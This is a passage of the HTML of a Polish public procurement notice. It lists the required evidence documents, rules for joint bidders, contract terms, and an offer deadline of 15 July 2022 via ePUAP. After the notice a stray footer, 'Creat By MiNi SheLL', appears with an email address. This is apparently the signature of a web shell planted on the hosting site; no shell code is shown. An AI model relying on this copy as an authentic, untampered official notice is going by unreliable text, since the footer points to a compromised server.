siedzibęlubmiejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przedorganemsądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowegolub gospodarczego,właściwym ze względu na siedzibę lub miejsce<br/>zamieszkaniawykonawcy. Dokumenty powinny byćwystawione nie wcześniej niż 3 miesięcy<br/>przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń<br/>powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy;<br/>2. Dokumentów dotyczących podmiotu trzeciego, w celu wykazania spełnienia, w zakresie,<br/>w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu jeżeli wykonawca polega na zasobach podmiotu trzeciego. Jeżeli z uzasadnionej przyczyny wykonawca nie<br/>może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, wykonawca<br/>składa inne podmiotowe środki dowodowe, które<br/>w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w<br/>postępowaniu lub kryterium selekcji dotyczącego sytuacji ekonomicznej lub finansowej.<br/>3. Powyższe dokumenty należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii<br/>dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym<br/>podpisem elektronicznym osoby posiadającej uprawnienia notariusza.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony f o r m u l a r z o f e r t y – załącznik do siwz2) Wykonawca dołącza do ofertyoświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału<br/>wpostępowaniu wzakresie wskazanym w SWZ. Oświadczenie to stanowi dowód potwierdzający<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na<br/>dzień składania ofert,tymczasowo zastępujący wymagane podmiotowe środki dowodowe,<br/>wskazane w SWZ. 3)Oryginał pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzonyodpis pełnomocnictwa, w przypadku, gdy wykonawcę reprezentuje<br/>Pełnomocnik o ile prawo do podpisania oferty nie wynika z dokumentów, do których Zamawiający<br/>ma dostęp bądź z innych dokumentów dołączonych do oferty. Treść pełnomocnictwa<br/>musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest<br/>upoważniony. 4) Pisemne zobowiązanie innych<br/>podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania<br/>zamówienia - jeżeli wykonawca,zgodnie z art.125ust. 5 ustawy, polega na zdolnościach lub sytuacji innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, o<br/>czym mowa w punktach IX.6.1) – 7). <br/>5)W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika.<br/>Dokument pełnomocnictwa, z którego treści będzie wynikał o umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć<br/>do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w<br/>szczególności wskazanie:- postępowania o zamówienie publiczne, którego dotyczy,-wszystkich<br/>wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z<br/>określeniem adresu siedziby,- ustanowionego pełnomocnika oraz zakresu jego umocowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim<br/>przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Do oferty należy załączyć pełnomocnictwo podpisane przez upoważnionychprzedstawicieli wszystkich pozostałych wykonawców w formie oryginału lubkopii<br/>poświadczonejza zgodność z oryginałem przez notariusza. Złożona oferta musi byćpodpisana w<br/>taki sposób,byprawnie zobowiązywała wszystkich wykonawców<br/>występującychwspólnie.Pełnomocnictwoskłada się w oryginale lub kopii poświadczonej<br/>notarialnie.2. Wodniesieniu do wymagańpostawionych przez Zamawiającego, każdy z<br/>wykonawcówwystępujących wspólnie musiudokumentować, że nie podlega wykluczeniu na<br/>podstawie art. 108ust. 1 i 2 oraz 109ust.1pkt.4,5,7-10 ustawy. Warunki udziału w postępowaniu<br/>określone w art. 112 ust. 2 pkt 2-3ustawyPZP (pkt VII SIWZ) musi spełniać co najmniej jeden<br/>wykonawcasamodzielnie lubwszyscy wykonawcy łącznie. 3. Wszelka korespondencja oraz<br/>rozliczeniadokonywane będąwyłącznie z pełnomocnikiem.4. Wykonawcy wspólnie ubiegający<br/>się oudzielenie zamówieniapublicznego ponoszą solidarną odpowiedzialność za wykonanie<br/>umowyoraz za szkody powstałez tytułu czynów niedozwolonych.5. Jeżeli oferta Wykonawców<br/>wspólnie ubiegających się oudzielenie zamówienia, zostanie wybrana jako najkorzystniejsza,<br/>Zamawiający zobowiązuje wykonawców przed zawarciem umowy w sprawie zamówienia<br/>publicznego, do przedłożenia umowy regulującej współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia,zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP https://epuap.gov.pl/wps/portal iudostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-15 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com